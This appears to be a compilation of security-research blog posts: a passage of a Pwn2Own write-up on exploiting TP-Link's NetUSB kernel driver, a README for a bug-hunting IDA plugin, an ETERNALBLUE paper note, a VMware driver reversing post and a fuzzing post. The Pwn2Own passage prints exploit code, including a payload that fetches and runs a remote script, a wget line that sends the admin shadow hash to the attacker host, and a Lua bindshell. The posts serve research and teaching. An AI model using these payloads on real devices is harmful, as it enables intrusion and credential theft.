  const struct iw_handler_def * wireless_handlers;
  /* Instance data managed by the core of Wireless Extensions. */
  struct iw_public_data * wireless_data;
#endif
// ...
#if IS_ENABLED(CONFIG_VLAN_8021Q)
  struct vlan_info __rcu  *vlan_info; /* VLAN info */
#endif
#if IS_ENABLED(CONFIG_NET_DSA)
  struct dsa_switch_tree  *dsa_ptr; /* dsa specific data */
#endif
// ...
#ifdef CONFIG_SYSFS
  struct kset   *queues_kset;
#endif

#ifdef CONFIG_RPS
  struct netdev_rx_queue  *_rx;

  /* Number of RX queues allocated at register_netdev() time */
  unsigned int    num_rx_queues;

  /* Number of RX queues currently active in device */
  unsigned int    real_num_rx_queues;

#ifdef CONFIG_RFS_ACCEL
  /* CPU reverse-mapping for RX completion interrupts, indexed
   * by RX queue number.  Assigned by driver.  This must only be
   * set if the ndo_rx_flow_steer operation is defined. */
  struct cpu_rmap   *rx_cpu_rmap;
#endif
#endif
//...
};

Once I figured that out, I went through a pretty lengthy process of trial and error. I would start the driver, get information about the crash and try to look at the code / structures involved and see if a kernel configuration option would impact the layout of a relevant structure. From there, I could see the difference between the kernel configuration for my bootable QEMU image and the kernel I had built from the GPL and see where were mismatches. If there was one, I could simply turn the option on or off, recompile and hope that it doesn't make the kernel unbootable under QEMU.

After at least 136 compilations (the number of times I found make ARCH=mips in one of my .bash_history 😅) and an enormous amount of frustration, I eventually built a Linux kernel version able to run NetUSB.ko 😲:

[email protected]:~/pwn2own$ qemu-system-mips -m 128M -nographic -append "root=/dev/sda1 mem=128M" -kernel linux338.vmlinux.elf -M malta -cpu 74Kf -s -hda debian_wheezy_mips_standard.qcow2 -net nic,netdev=network0 -netdev user,id=network0,hostfwd=tcp:127.0.0.1:20005-10.0.2.15:20005,hostfwd=tcp:127.0.0.1:33344-10.0.2.15:33344,hostfwd=tcp:127.0.0.1:31337-10.0.2.15:31337
[...]
[email protected]:~# ./start.sh
[   89.092000] new slab @ 86964000
[   89.108000] kcg 333 :GPL NetUSB up!
[   89.240000] NetUSB: module license 'Proprietary' taints kernel.
[   89.240000] Disabling lock debugging due to kernel taint
[   89.268000] kc   90 : run_telnetDBGDServer start
[   89.272000] kc  227 : init_DebugD end
[   89.272000] INFO17F8: NetUSB 1.02.69, 00030308 : Jun 11 2015 18:15:00
[   89.272000] INFO17FA: 7437: Archer C7    :Archer C7
[   89.272000] INFO17FB:  AUTH ISOC
[   89.272000] INFO17FC:  filterAudio
[   89.272000] usbcore: registered new interface driver KC NetUSB General Driver
[   89.276000] INFO0145:  init proc : PAGE_SIZE 4096
[   89.280000] INFO16EC:  infomap 869c6e38
[   89.280000] INFO16EF:  sleep to wait eth0 to wake up
[   89.280000] INFO15BF: tcpConnector() started... : eth0
NetUSB 160207 0 - Live 0x869c0000 (P)
GPL_NetUSB 3409 1 NetUSB, Live 0x8694f000
[email protected]:~# [   92.308000] INFO1572: Bind to eth0

For the readers that would like to do the same, here are some technical details that they might find useful (I probably forgot most of the other ones): - I used debootstrap to easily be able to install older Linux distributions until one worked fine with package dependencies, older libc, etc. I used a Debian Wheezy (7.11) distribution to build the GPL code from TP-Link as well as cross-compiling the kernel. I uploaded archives of those two systems: wheezy-openwrt-ath.tar.xz and wheezy-compile-kernel.tar.xz. You should be able to extract those on a regular Ubuntu Intel x64 VM and chroot in those folders and SHOULD be able to reproduce what I described. Or at least, be very close from reproducing. - I cross compiled the kernel using the following toolchain: toolchain-mips_r2_gcc-4.6-linaro_uClibc-0.9.33.2 (gcc (Linaro GCC 4.6-2012.02) 4.6.3 20120201 (prerelease)). I used the following command to compile the kernel: $ make ARCH=mips CROSS_COMPILE=/home/toolchain-mips_r2_gcc-4.6-linaro_uClibc-0.9.33.2/bin/mips-openwrt-linux- -j8 vmlinux. You can find the toolchain in wheezy-openwrt-ath.tar.xz which is downloaded / compiled from the GPL code, or you can grab the binaries directly off wheezy-compile-kernel.tar.xz. - You can find the command line I used to start QEMU in start_qemu.sh and dbg.sh to attach GDB to the kernel.

Enters Zenith

Once I was able to attach GDB to the kernel I finally had an environment where I could get as much introspection as I needed. Note that because of all the modifications I had done to the kernel config, I didn't really know if it would be possible to port the exploit to the real target. But I also didn't have an exploit at the time, so I figured this would be another problem to solve later if I even get there.

I started to read a lot of code, documentation and papers about Linux kernel exploitation. The linux kernel version was old enough that it didn't have a bunch of more recent mitigations. This gave me some hope. I spent quite a bit of time trying to exploit the overflow from above. In Exploiting the Linux kernel via packet sockets Andrey Konovalov describes in details an attack that looked like could work for the bug I had found. Also, read the article as it is both well written and fascinating. The overall idea is that kmalloc internally uses the buddy allocator to get pages off the kernel and as a result, we might be able to place the buddy page that we can overflow right before pages used to store a kmalloc slab. If I remember correctly, my strategy was to drain the order 0 freelist (blocks of memory that are 0x1000 bytes) which would force blocks from the higher order to be broken down to feed the freelist. I imagined that a block from the order 1 freelist could be broken into 2 chunks of 0x1000 which would mean I could get a 0x1000 block adjacent to another 0x1000 block that could be now used by a kmalloc-1024 slab. I struggled and tried a lot of things and never managed to pull it off. I remember the bug had a few annoying things I hadn't realized when finding it, but I am sure a more experienced Linux kernel hacker could have written an exploit for this bug.

I thought, oh well. Maybe there's something better. Maybe I should focus on looking for a similar bug but in a kmalloc'd region as I wouldn't have to deal with the same problems as above. I would still need to worry about being able to place the buffer adjacent to a juicy corruption target though. After looking around for a bit longer I found another integer overflow:

void *SoftwareBus_dispatchNormalEPMsgOut(SbusConnection_t *SbusConnection, char HostCommand, char Opcode)
{
  // ...
  switch (OpcodeMasked) {
    case 0x50:
        if (SoftwareBus_fillBuf(SbusConnection, ReceiveBuffer, 4)) {
          ReceivedSize = _bswapw(*(uint32_t*)ReceiveBuffer);
            AllocatedBuffer = _kmalloc(ReceivedSize + 17, 208);
            if (!AllocatedBuffer) {
                return kc_printf("INFO%04X: Out of memory in USBSoftwareBus", 4296);
            }
  // ...
            if (!SoftwareBus_fillBuf(SbusConnection, AllocatedBuffer + 16, ReceivedSize))

Cool. But at this point, I was a bit out of my depth. I was able to overflow kmalloc-128 but didn't really know what type of useful objects I would be able to put there from over the network. After a bunch of trial and error I started to notice that if I was taking a small pause after the allocation of the buffer but before overflowing it, an interesting structure would be magically allocated fairly close from my buffer. To this day, I haven't fully debugged where it exactly came from but as this was my only lead I went along with it.

The target kernel doesn't have ASLR and doesn't have NX, so my exploit is able to hardcode addresses and execute the heap directly which was nice. I can also place arbitrary data in the heap using the various allocation functions I had reverse-engineered earlier. For example, triggering a 3MB large allocation always returned a fixed address where I could stage content. To get this address, I simply patched the driver binary to output the address on the real device after the allocation as I couldn't debug it.

# (gdb) x/10dwx 0xffffffff8522a000
# 0x8522a000:     0xff510000      0x1000ffff      0xffff4433      0x22110000
# 0x8522a010:     0x0000000d      0x0000000d      0x0000000d      0x0000000d
# 0x8522a020:     0x0000000d      0x0000000d
addr_payload = 0x83c00000 + 0x10

# ...

def main(stdscr):
  # ...
  # Let's get to business.
  _3mb = 3 * 1_024 * 1_024
  payload_sprayer = SprayerThread(args.target, 'payload sprayer')
  payload_sprayer.set_length(_3mb)
  payload_sprayer.set_spray_content(payload)
  payload_sprayer.start()
  leaker.wait_for_one()
  sprayers.append(payload_sprayer)
  log(f'Payload placed @ {hex(addr_payload)}')
  y += 1

My final exploit, Zenith, overflows an adjacent wait_queue_head_t.head.next structure that is placed by the socket stack of the Linux kernel with the address of a crafted wait_queue_entry_t under my control (Trasher class in the exploit code). This is the definition of the structure:

struct wait_queue_head {
  spinlock_t    lock;
  struct list_head  head;
};

struct wait_queue_entry {
  unsigned int    flags;
  void      *private;
  wait_queue_func_t func;
  struct list_head  entry;
};

This structure has a function pointer, func, that I use to hijack the execution and redirect the flow to a fixed location, in a large kernel heap chunk where I previously staged the payload (0x83c00000 in the exploit code). The function invoking the func function pointer is __wake_up_common and you can see its code below:

static void __wake_up_common(wait_queue_head_t *q, unsigned int mode,
      int nr_exclusive, int wake_flags, void *key)
{
  wait_queue_t *curr, *next;

  list_for_each_entry_safe(curr, next, &q->task_list, task_list) {
    unsigned flags = curr->flags;

    if (curr->func(curr, mode, wake_flags, key) &&
        (flags & WQ_FLAG_EXCLUSIVE) && !--nr_exclusive)
      break;
  }
}

This is what it looks like in GDB once q->head.next/prev has been corrupted:

(gdb) break *__wake_up_common+0x30 if ($v0 & 0xffffff00) == 0xdeadbe00

(gdb) break sock_recvmsg if msg->msg_iov[0].iov_len == 0xffffffff

(gdb) c
Continuing.
sock_recvmsg(dst=0xffffffff85173390)

Breakpoint 2, __wake_up_common (q=0x85173480, mode=1, nr_exclusive=1, wake_flags=1, key=0xc1)
    at kernel/sched/core.c:3375
3375    kernel/sched/core.c: No such file or directory.

(gdb) p *q
$1 = {lock = {{rlock = {raw_lock = {<No data fields>}}}}, task_list = {next = 0xdeadbee1,
    prev = 0xbaadc0d1}}

(gdb) bt
#0  __wake_up_common (q=0x85173480, mode=1, nr_exclusive=1, wake_flags=1, key=0xc1)
    at kernel/sched/core.c:3375
#1  0x80141ea8 in __wake_up_sync_key (q=<optimized out>, mode=<optimized out>,
    nr_exclusive=<optimized out>, key=<optimized out>) at kernel/sched/core.c:3450
#2  0x8045d2d4 in tcp_prequeue (skb=0x87eb4e40, sk=0x851e5f80) at include/net/tcp.h:964
#3  tcp_v4_rcv (skb=0x87eb4e40) at net/ipv4/tcp_ipv4.c:1736
#4  0x8043ae14 in ip_local_deliver_finish (skb=0x87eb4e40) at net/ipv4/ip_input.c:226
#5  0x8040d640 in __netif_receive_skb (skb=0x87eb4e40) at net/core/dev.c:3341
#6  0x803c50c8 in pcnet32_rx_entry (entry=<optimized out>, rxp=0xa0c04060, lp=0x87d08c00,
    dev=0x87d08800) at drivers/net/ethernet/amd/pcnet32.c:1199
#7  pcnet32_rx (budget=16, dev=0x87d08800) at drivers/net/ethernet/amd/pcnet32.c:1212
#8  pcnet32_poll (napi=0x87d08c5c, budget=16) at drivers/net/ethernet/amd/pcnet32.c:1324
#9  0x8040dab0 in net_rx_action (h=<optimized out>) at net/core/dev.c:3944
#10 0x801244ec in __do_softirq () at kernel/softirq.c:244
#11 0x80124708 in do_softirq () at kernel/softirq.c:293
#12 do_softirq () at kernel/softirq.c:280
#13 0x80124948 in invoke_softirq () at kernel/softirq.c:337
#14 irq_exit () at kernel/softirq.c:356
#15 0x8010198c in ret_from_exception () at arch/mips/kernel/entry.S:34

Once the func pointer is invoked, I get control over the execution flow and I execute a simple kernel payload that leverages call_usermodehelper_setup / call_usermodehelper_exec to execute user mode commands as root. It pulls a shell script off a listening HTTP server on the attacker machine and executes it.

arg0: .asciiz "/bin/sh"
arg1: .asciiz "-c"
arg2: .asciiz "wget http://{ip_local}:8000/pwn.sh && chmod +x pwn.sh && ./pwn.sh"
argv: .word arg0
      .word arg1
      .word arg2
envp: .word 0

The pwn.sh shell script simply leaks the admin's shadow hash, and opens a bindshell (cheers to Thomas Chauchefoin and Kevin Denis for the Lua oneliner) the attacker can connect to (if the kernel hasn't crashed yet 😳):

#!/bin/sh
export LPORT=31337
wget http://{ip_local}:8000/pwd?$(grep -E admin: /etc/shadow)
lua -e 'local k=require("socket");
  local s=assert(k.bind("*",os.getenv("LPORT")));
  local c=s:accept();
  while true do
    local r,x=c:receive();local f=assert(io.popen(r,"r"));
    local b=assert(f:read("*a"));c:send(b);
  end;c:close();f:close();'

The exploit also uses the debug interface that I mentioned earlier as it leaks kernel-mode pointers and is overall useful for basic synchronization (cf the Leaker class).

OK at that point, it works in QEMU... which is pretty wild. Never thought it would. Ever. What's also wild is that I am still in time for the Pwn2Own registration, so maybe this is also possible 🤔. Reliability wise, it worked well enough on the QEMU environment: about 3 times about 5 I would say. Good enough.

I started to port over the exploit to the real device and to my surprise it also worked there as well. The reliability was poorer but I was impressed that it still worked. Crazy. Especially with both the hardware and the kernel being different! As I still wasn't able to debug the target's kernel I was left with dmesg outputs to try to make things better. Tweak the spray here and there, try to go faster or slower; trying to find a magic combination. In the end, I didn't find anything magic; the exploit was unreliable but hey I only needed it to land once on stage 😅. This is what it looks like when the stars align 💥:

Beautiful. Time to register!

Entering the contest

As the contest was fully remote (bummer!) because of COVID-19, contestants needed to provide exploits and documentation prior to the contest. Fully remote meant that the ZDI stuff would throw our exploits on the environment they had set-up.

At that point we had two exploits and that's what we registered for. Right after receiving confirmation from ZDI, I noticed that TP-Link pushed an update for the router 😳. I thought Damn. I was at work when I saw the news and was stressed about the bug getting killed. Or worried that the update could have changed anything that my exploit was relying on: the kernel, etc. I finished my day at work and pulled down the firmware from the website. I checked the release notes while the archive was downloading but it didn't have any hints suggesting that they had updated either NetUSB or the kernel which was.. good. I extracted the file off the firmware file with binwalk and quickly verified the NetUSB.ko file. I grabbed a hash and ... it was the same. Wow. What a relief 😮‍💨.

When the time of demonstrating my exploit came, it unfortunately didn't land in the three attempts which was a bit frustrating. Although it was frustrating, I knew from the beginning that my odds weren't the best entering the contest. I remembered that I originally didn't even think that I'd be able to compete and so I took this experience as a win on its own.

On the bright side, my teammates were real pros and landed their exploits which was awesome to see 🍾🏆.

Wrapping up

Participating in Pwn2Own had been on my todo list for the longest time so seeing that it could be done felt great. I also learned a lot of lessons while doing it:

  • Attacking the kernel might be cool, but it is an absolute pain to debug / set-up an environment. I probably would not go that route again if I was doing it again.
  • Vendor patching bugs at the last minute can be stressful and is really not fun. My teammate got their first exploit killed by an update which was annoying. Fortunately, they were able to find another vulnerability and this one stayed alive.
  • Getting a root shell on the device ASAP is a good idea. I initially tried to find a post auth vulnerability statically to get a root shell but that was wasted time.
  • The Ghidra disassembler decompiles MIPS32 code pretty well. It wasn't perfect but a net positive.
  • I also realized later that the same driver was running on the Netgear router and was reachable from the WAN port. I wasn't in it for the money but maybe it would be good for me to do a better job at taking a look at more than a target instead of directly diving deep into one exclusively.
  • The ZDI team is awesome. They are rooting for you and want you to win. No, really. Don't hesitate to reach out to them with questions.
  • Higher payouts don't necessarily mean a harder target.

You can find all the code and scripts in the zenith Github repository. If you want to read more about NetUSB here are a few more references:

I hope you enjoyed the post and I'll see you next time 😊! Special thanks to my boi yrp604 for coming up with the title and thanks again to both yrp604 and __x86 for proofreading this article 🙏🏽.

Oh, and come hangout on Diary of reverse-engineering's Discord server with us!

Announcing Self-Paced Trainings!

Self-paced trainings are arriving for all existing public trainings, this includes:

  • Vulnerability Research & Fuzzing

  • Reverse Engineering

  • Offensive Tool Development

  • Misc workshops

This change comes from both interest from previous students & my own preference to learn via pre-recorded content.

Features of self-paced trainings include:

  • Pre-recorded content that matches the 4-day live training versions

    • Includes all the materials you’d normally get in the 4-day live version

    • Includes a free seat on the next 4-day live version (pending seat availability)

  • Unlimited discussions via email/twitter/discord with instructor

  • Free and paid workshops / mini-trainings on various topics

    • I also take requests on workshops / mini-trainings / topics you’d like to see

Different platforms for hosting the self-paced versions have been considered, currently we’re experimenting with the Thinkific platform and are in the process of modifying & uploading all the recorded content (I recently relocated from Australia to USA — this has delayed the self-paced development a bit, but a lot of content is currently uploaded).

While the self-paced versions are being edited and uploaded, I’m offering access to it at a discounted rate (20% off!), this gets you:

  • Access to draft versions of the training content as they’re developed

  • Lifetime Access to the training once completed

Once a particular training has been finalized, the discount for it will no longer be offered.

You can find the draft self-paced training offerings (as they’re developed) here: https://signal-labs.thinkific.com/collections

(Link will be updated when training is finalized)


For any questions feel free to contact us via email at [email protected]

Happy Hacking!

VulFi - Plugin To IDA Pro Which Can Be Used To Assist During Bug Hunting In Binaries


The VulFi (Vulnerability Finder) tool is a plugin to IDA Pro which can be used to assist during bug hunting in binaries. Its main objective is to provide a single view with all cross-references to the most interesting functions (such as strcpy, sprintf, system, etc.). For cases where a Hexrays decompiler can be used, it will attempt to rule out calls to these functions which are not interesting from a vulnerability research perspective (think something like strcpy(dst,"Hello World!")). Without the decompiler, the rules are much simpler (to not depend on architecture) and thus only rule out the most obvious cases.


Installation

Place the vulfi.py, vulfi_prototypes.json and vulfi_rules.json files in the IDA plugin folder (cp vulfi* <IDA_PLUGIN_FOLDER>).

Preparing the Database File

Before you run VulFi make sure that you have a good understanding of the binary that you work with. Try to identify all standard functions (strcpy, memcpy, etc.) and name them accordingly. The plugin is case insensitive and thus MEMCPY, Memcpy and memcpy are all valid names. However, note that the search for the function requires exact match. This means that memcpy? or std_memcpy (or any other variant) will not be detected as a standard function and therefore will not be considered when looking for potential vulnerabilities. If you are working with an unknown binary you need to set the compiler options first Options > Compiler. After that VulFi will do its best to filter all obvious false positives (such as call to printf with constant string as a first parameter). Please note that while the plugin is made without any ties to a specific ar chitecture some processors do not have full support for specifying types and in such case VulFi will simply mark all cross-references to potentially dangerous standard functions to allow you to proceed with manual analysis. In these cases, you can benefit from the tracking features of the plugin.

Usage

Scanning

To initiate the scan, select Search > VulFi option from the top bar menu. This will either initiate a new scan, or it will read previous results stored inside the idb/i64 file. The data are automatically saved whenever you save the database.

Once the scan is completed or once the previous results are loaded a table will be presented with a view containing following columns:

  • IssueName - Used as a title for the suspected issue.
  • FunctionName - Name of the function.
  • FoundIn - The function that contains the potentially interesting reference.
  • Address - The address of the detected call.
  • Status - The review status, initial Not Checked is assigned to every new item. The other statuses are False Positive, Suspicious and Vulnerable. Those can be set using a right-click menu on a given item and should reflect the results of the manual review of the given function call.
  • Priority - An attempt to prioritize more interesting calls over the less interesting ones. Possible values are High, Medium and Low. The priorities are defined along with other rules in vulfi_rules.json file.
  • Comment - A user defined comment for the given item.

In case that there are no data inside the idb/i64 file or user decides to perform a new scan. The plugin will ask whether it should run the scan using the default included rules or whether it should use a custom rules file. Please note that running a new scan with already existing data does not overwrite the previously found items identified by the rule with the same name as the one with previously stored results. Therefore, running the scan again does not delete existing comments and status updates.

In the right-click context menu within the VulFi view, you can also remove the item from the results or remove all items. Please note that any comments or status updates will be lost after performing this operation.

Investigation

Whenever you would like to inspect the detected instance of a possible vulnerable function, just double-click anywhere in the desired row and IDA will take you to the memory location which was identified as potentially interesting. Using a right-click and option Set Vulfi Comment allows you to enter comment for the given instance (to justify the status for example).

Adding More Functions

The plugin also allows for creating custom rules. These rules could be defined in the IDA interface (ideal for single functions) or supplied as a custom rule file (ideal for rules that aim to cover multiple functions).

Within the Interface

When you would like to trace a custom function, which was identified during the analysis, just switch the IDA View to that function, right-click anywhere within its body and select Add current function to VulFi.

Custom Set of Rules

It is also possible to load a custom file with set of multiple rules. To create a custom rule file with the below structure you can use the included template file here.

[   // An array of rules
{
"name": "RULE NAME", // The name of the rule
"alt_names":[
"function_name_to_look_for" // List of all function names that should be matched against the conditions defined in this rule
],
"wrappers":true, // Look for wrappers of the above functions as well (note that the wrapped function has to also match the rule)
"mark_if":{
"High":"True", // If evaluates to True, mark with priority High (see Rules below)
"Medium":"False", // If evaluates to True, mark with priority Medium (see Rules below)
"Low": "False" // If evaluates to True, mark with priority Low (see Rules below)
}
}
]

An example rule that looks for all cross-references to function malloc and checks whether its paramter is not constant and whether the return value of the function is checked is shown below:

{
"name": "Possible Null Pointer Dereference",
"alt_names":[
"malloc",
"_malloc",
".malloc"
],
"wrappers":false,
"mark_if":{
"High":"not param[0].is_constant() and not function_call.return_value_checked()",
"Medium":"False",
"Low": "False"
}
}

Rules

Available Variables

  • param[<index>]: Used to access the parameter to a function call (index starts at 0)
  • function_call: Used to access the function call event
  • param_count: Holds the count of parameters that were passed to a function

Available Functions

  • Is parameter a constant: param[<index>].is_constant()
  • Get numeric value of parameter: param[<index>].number_value()
  • Get string value of parameter: param[<index>].string_value()
  • Is parameter set to null after the call: param[<index>].set_to_null_after_call()
  • Is return value of a function checked: function_call.return_value_checked(<constant_to_check>)

Examples

  • Mark all calls to a function where third parameter is > 5: param[2].number_value() > 5
  • Mark all calls to a function where the second parameter contains "%s": "%s" in param[1].string_value()
  • Mark all calls to a function where the second parameter is not constant: not param[1].is_constant()
  • Mark all calls to a function where the return value is validated against the value that is equal to the number of parameters: function_call.return_value_checked(param_count)
  • Mark all calls to a function where the return value is validated against any value: function_call.return_value_checked()
  • Mark all calls to a function where none of the parameters starting from the third are constants: all(not p.is_constant() for p in param[2:])
  • Mark all calls to a function where any of the parameters are constant: any(p.is_constant() for p in param)
  • Mark all calls to a function: True

Issues and Warnings

  • When you request the parameter with index that is out of bounds any call to a function will be marked as Low priority. This is a way to avoid missing cross references where it was not possible to correctly get all parameters (this mainly applies to disassembly mode).
  • When you search within the VulFi view and change context out of the view and come back, the view will not load. You can solve this either by terminating the search operation before switching the context, moving the VulFi view to the side-view so that it is always visible or by closing and re-opening the view (no data will be lost).
  • Scans for more exotic architectures end with a lot of false positives.


ETERNALBLUE: Exploit Analysis and Port to Microsoft Windows 10

The whitepaper for the research done on ETERNALBLUE by @JennaMagius and I has been completed.

Be sure to check the bibliography for other great writeups of the pool grooming and overflow process. This paper breaks some new ground by explaining the execution chain after the memory corrupting overwrite is complete.

PDF Download

Errata

r5hjrtgher pointed out the vulnerable code section did not appear accurate. Upon further investigation, we discovered this was correct. The confusion was because unlike the version of Windows Server 2008 we originally reversed, on Windows 10 the Srv!SrvOs2FeaListSizeToNt function was inlined inside Srv!SrvOs2FeaListToNt. We saw a similar code path and hastily concluded it was the vulnerable one. Narrowing the exact location was not necessary to port the exploit.

Here is the correct vulnerable code path for Windows 10 version 1511:

How the vulnerability was patched with MS17-010:

The 16-bit registers were replaced with 32-bit versions, to prevent the mathematical miscalculation leading to buffer overflow.

Minor note: there was also extra assembly and mitigations added in the code paths leading to this.

To all the foreign intelligence agencies trying to spear phish I've already deleted all my data! :tinfoil:

Finding a Kernel 0-day in VMware vCenter Converter via Static Reverse Engineering

I posted a poll on twitter (Christopher on Twitter: "Next blog topic?" / Twitter) to decide on what this blog post would be about, and the results indicated it should be about Kernel driver reversing.

I figured I’d make it a bit more exciting by finding a new Kernel 0-day to integrate into the blog post, and so I started thinking what driver would be a fun target.
I’ve reversed VMware drivers before, primarily ones relating to their Hypervisor, but I’ve also used their vCenter Converter tool before and wondered what attack surface that introduces when installed.

Turns out it installs a Kernel component (vstor2-x64.sys) which is interactable via low-privileged users, we can see this driver installed with the name “vstor2-mntapi20-shared” in the “Driver” directory using Sysinternals’ WinObj.exe tool.

To confirm low-privileged users can interact with this driver, we take a look at the “Device” directory.
Drivers have various ways of communicating with user-land code, one common method is for the driver to expose a device that user-land code can open a handle to (using the CreateFile APIs), we find the device with the same name, double-click it and view its security attributes:

We see in the device security properties that the “everyone” group has read & write permissions, this means low-privileged users can obtain a handle to the device and use it to communicate to the driver.

Note that the driver and device names in these directories are set in the driver’s DriverEntry when it is loaded by Windows, first the device is created using IoCreateDevice, usually followed by a symbolic link creation using IoCreateSymbolicLink to give access to user-land code.

When a user-land process wants to communicate with a device driver, it will obtain a file handle to the device. In this case the code would look like:

#define USR_DEVICE_NAME L"\\\\.\\vstor2-mntapi20-shared"

HANDLE hDevice = CreateFileW(USR_DEVICE_NAME,

GENERIC_READ | GENERIC_WRITE,

FILE_SHARE_READ | FILE_SHARE_WRITE,

NULL,

OPEN_EXISTING,

0,

NULL);

This code results in the IRP_MJ_CREATE_HANDLER dispatch handler for the driver being called, this dispatch handler is part of the DRIVER_OBJECT for the target driver, which is the first argument to the driver’s DriverEntry, this structure has a MajorFunction array which can be set to function pointers that will handle callbacks for various events (like the create handler being called when a process opens a handle to the device driver)

In the image above we know the first argument to DriverEntry for any driver is a pointer to the DRIVER_OBJECT structure, with this information we can follow where this variable is used to find the code that sets the function pointers for the MajorFunction array.

We can find out which MajorFunction index maps to which IRP_MJ_xxx function by looking at sample code provided by Microsoft, specifically on line 284 here.

Since we now know which array index maps to which function, we rename the functions with meaningful names as shown in the image above (e.g. we name entry 0xe to ioctl_handler, as it handles DeviceIoControl messages from processes.

The read & write callbacks are called when a process calls ReadFile or WriteFile on the device handle, there are other callbacks too which we won’t go through.

To start with, lets analyze the irp_mj_create handler and see what happens when we create a handle to this device driver.

By default, this is what we see:

Firstly, we can improve decompilation by setting the correct types for a1 and a2, which we know must conform to the DRIVER_DISPATCH specification.

Doing so results in the following:

There’s a few things happening in this function, two important structures shown that are usually important are:

  • DeviceExtension object in the DEVICE_OBJECT structure

  • FsContext object in the IRP->CurrentStackLocation->FileObject structure

The DeviceExtension object is a pointer to a buffer created and managed by the driver object. It is accessible to the driver via the DEVICE_OBJECT structure (and thus accessible to the driver in all DRIVER_DISPATCH callbacks. Drivers typically create and use this buffer to manage state, variables & other information the driver wants to be able to access in a variety of locations (for example, if the driver supports various functions to Open, Read, Write or Close TCP connections via IOCTLs, the driver may store its current state (e.g. whether the connection is Open or Closed) in this DeviceExtension buffer, and whenever the Close function is called, it will check the state in the DeviceExtension buffer to ensure its in a state that can be closed), essentially its just a buffer that the driver uses to store/retrieve information from a variety of contexts/functions.

The FsContext structure is similar and can be used as an arbitrary buffer, the main difference is that the DEVICE_OBJECT structure is created by the driver during the IoCreateDevice call, which means the DeviceExtension buffer does not get torn down or re-created when a user process opens or closes a handle to the device, while the FsContext structure is associated with a FILE_OBJECT structure that is created when CreateFile is called, and destroyed when the handle is closed, meaning the FsContext buffer is per-handle.

From the decompiled code we see that a buffer of 0x20 size is allocated and set to be the FsContext structure, and we also see that the first 64bits of this structure is set to v5 in the code, which corresponds to the DeviceExtension pointer, meaning we already figured out that the FsContext struct contains a pointer to the DeviceExtension as its first element.

E.g.

struct FsContext {

PVOID pDevExt;

};

Figuring out the rest of the elements to the FsContext and DeviceExtension structures is a simple but sometimes tedious process of looking at all the DRIVER_DISPATCH functions for the driver (like the ioctl handler) and noting down what offsets are accessed in these structs and how they’re used (e.g. if offset 0x8 in the DeviceExtension is used in a KeAcquireSpinLockRaiseToDpc call, then we know that offset is a pointer to a KSPIN_LOCK object).

Taking the time to documents the structures this way pays off, it helps greatly when trying to understanding the decompilation, as with some effort we can transform the IRP_MJ_CREATE handler to look like the below:

When looking at the FsContext structure for example, we can open Ida’s Local Types window and create it using C syntax, which I created below:

Note that as you figure out what each element is, you can define the elements as random junk and rename/retype them as you go (so long as you know the size of the structure, which we get easily here via the 0x20 size argument to ExAllocatePoolWithTag).

Now that we’ve analyzed the IRP_MJ_CREATE handler and determined there’s nothing stopping us from creating a handle, we can look into how the driver handles Read, Write & DeviceIOControl requests from user processes.

In analyzing these handlers, we see heavy usage of the FsContext and DeviceExtension buffers, including checks on whether its contents are initialized.

Turns out, there are quite a few vulnerabilities in this driver that are reachable if you form your input correctly to hit their code paths, while I won’t go through all of them (some are still pending disclosure!), we will take a look at one which is a simple user->kernel DoS.

In IOCTL 0x2A0014 we see the DeviceExtension buffer get memset to 0 to clear its contents:

This is followed by a memmove that copies 0x100 bytes from the user’s input buffer to the DeviceExtension buffer, meaning those byte offsets we copy into are user controlled (I denote this with a _uc tag at the end of the variable name:

During this IOCTL, another field in the DeviceExtension also gets set (which seems to indicate that the DeviceExtension buffer has been initialized):

This is critical to triggering the bug (which we will see next).

So, the actual bug doesn’t live in the IOCTL handlers, instead it lives in the IRP_MJ_READ and IRP_MJ_WRITE handlers (note that in this case the READ and WRITE handlers are the same function, they just check the provided IRP to determine if the operation is a READ or WRITE).

In this handler, we can see a check to determine if the DeviceExtension’s some_if_field has been initialized:

After clearing this condition, the bug can be seen in sub_12840 in the following condition statement:

Here we see I denoted the unkn13 variable in the DeviceExtension buffer with _uc, this means its user controlled (in fact, its set during the memmove call we saw earlier).

From the decompilation we see that the code does a % operation on our user controllable value, this translates to a div instruction:

If you’re familiar with X86, you’ll know that a div instruction on the value 0 causes a divide-by-zero exception, we can easily trigger this here by provided an input buffer filled with 0 when we call the IOCTL 0x2A0014 to set the user controllable contents in the DeviceExtension buffer, then we can trigger this code by attempting to read/write the device handle using ReadFile or WriteFile APIs.

In fact there are multiple ways to trigger this, as the DeviceExtension buffer is essentially a global buffer, and no locking is used when reading this value, there exist race conditions where one thread is calling IOCTL 0x2A0014 and another is calling the read or write handler, such that this div instruction may be hit right after the memset operation in IOCTL 0x2A0014 clears the DeviceExtension buffer to 0.

In fact, there are multiple locations such race conditions would affect the code paths taken in this driver!

Overall, this driver is a good target for reverse engineering practice with Kernel drivers due to its use of not only IOCTLs, but also read & write handlers + the use of the FsContext and DeviceExtension buffers that need to be reversed to understand what the driver is doing, and how we can influence it. All the bugs found in this driver were purely from static reverse engineering as a fun exercise.

Interested in Reverse Engineering & Vulnerability Research Training?

We frequently run public sessions (or private sessions upon request) for trainings in Reverse Engineering & Vulnerability Research, see our Upcoming Trainings or Subscribe to get notified of our next public session dates.

Fuzzing FoxitReader 9.7’s ConvertToPDF

Inspiration to create a fuzzing harness for FoxitReader’s ConvertToPDF function (targeting version 9.7) came from discovering Richard Johnson’s fuzzer for a previous version of FoxitReader.

(found here: https://www.cnblogs.com/st404/p/9384704.html).

Multiple changes have since been introduced in the way FoxitReader converts an image to a PDF, including the introduction of new Vtables entries, the necessity to load in the main FoxitReader.exe binary (including fixing the IAT and modifying data sections to contain valid handles to the current process heap) + more.

The source for my version of the fuzzing harness targeting version 9.7 can be found on my GitHub: https://github.com/Kharos102/FoxitFuzz9.7

Below is a quick walkthrough of the reversing and coding performed to get this harness working.

Firstly — based on the existing work from the previous fuzzers available, we know that most of the calls for the conversion of an image to a PDF occur via vtable function calls from an object returned from ConvertToPDF_x86!CreateFXPDFConvertor, however this could also be found manually by debugging the application and adding a breakpoint on file read accesses to the image we supply as a parameter to the conversion function, and then walking the call stack.

To start our harness, I decided to analyse how the actual FoxitReader.exe process sets up objects required for the conversion function by setting a breakpoint for the CreateFXPDFConvertor function.

Next, by stepping out and setting a breakpoint on all the vtable function pointers for the returned object, we can discover what order these functions are called along with their parameters as this will be necessary for us to setup the object before calling the actual conversion routine.

Dumping the Object’s VTable

We know how to view the vtable as the pointer to the vtable is the first 4-bytes (32bit) when dumping the object.

